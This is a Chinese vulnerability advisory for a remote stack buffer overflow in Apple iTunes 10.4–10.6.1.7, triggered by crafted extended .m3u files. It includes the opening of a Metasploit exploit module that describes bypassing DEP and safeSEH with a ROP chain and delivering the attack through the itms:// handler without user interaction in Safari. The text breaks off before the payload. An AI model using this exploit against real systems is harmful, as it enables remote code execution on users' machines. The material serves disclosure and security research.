发布日期:2012-06-21
更新日期:2012-06-25
受影响系统:
Apple iTunes 10.6
Apple iTunes 10.5.1
Apple iTunes 10.5
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54113
iTunes是一款媒体播放器的应用程序,2001年1月10日由苹果电脑在旧金山的Macworld Expo推出,用来播放以及管理数字音乐和与视频文件,是管理苹果iPod的文件的主要工具。
iTunes 10.4.0.80至10.6.1.7版本在实现上存在远程栈缓冲区溢出漏洞,攻击者可利用此漏洞执行任意代码。
<*来源:Rh0
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Rh0 ()提供了如下测试方法:
##
#
# ============================================================================================
# * Apple iTunes <= 10.6.1.7 Extended m3u Stack Buffer Overflow Remote Code Execution (2012) *
# ============================================================================================
#
# Date: Jun 20 2012
# Author: Rh0
# Affected Versions: Apple iTunes 10.4.0.80 to 10.6.1.7
# Tested on: Windows XP Professional SP3 EN
#
#
#
# ============================================================================================
#
# This seems not to be CVE-2012-0677 as this here is stack based. However it was also fixed
# by Apple without mentioning it in the security fixes
# of iTunes 10.6.3.25
#
#
# - written for educational purposes -
#
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
# e.g.: put this module into modules/exploit/windows/browser/itunes_extm3u_bof.rb
def initialize(info = {})
super(update_info(info,
'Name' => 'iTunes Extended M3U Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in iTunes 10.4.0.80 to 10.6.1.7.
When opening an extended .m3u file containing an "#EXTINF:" tag description,
iTunes will copy the content after "#EXTINF:" without appropriate checking
from a heap buffer to a stack buffer and write beyond the stack buffers boundary.
This allows arbitrary code execution.
The Windows XP target has to have QuickTime 7.7.2 installed for this module
to work. It uses a ROP chain from a non safeSEH enabled DLL to bypass DEP and
safeSEH. The stack cookie check is bypassed by triggering a SEH exception.
},
## NOTE ##
# Exploit works best if iTunes is not running and the user browses to a malicious page.
# But even if iTunes is already running and playing music, the exploit worked reliably
#
# remote code execution is possible via itms:// handler, which instructs a browser to open
# iTunes:
# Safari does not prompt for iTunes itms links -> RCE without user interaction
# Firefox, Opera, and IE ask the user for permission to launch iTunes
# Chrome asks for permission and spits a big warning
'Author' =>
[
'Rh0 <rh0 [at] z1p.biz>' # discovery and metasploit module
],
'Version' => '0.0',
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f'
},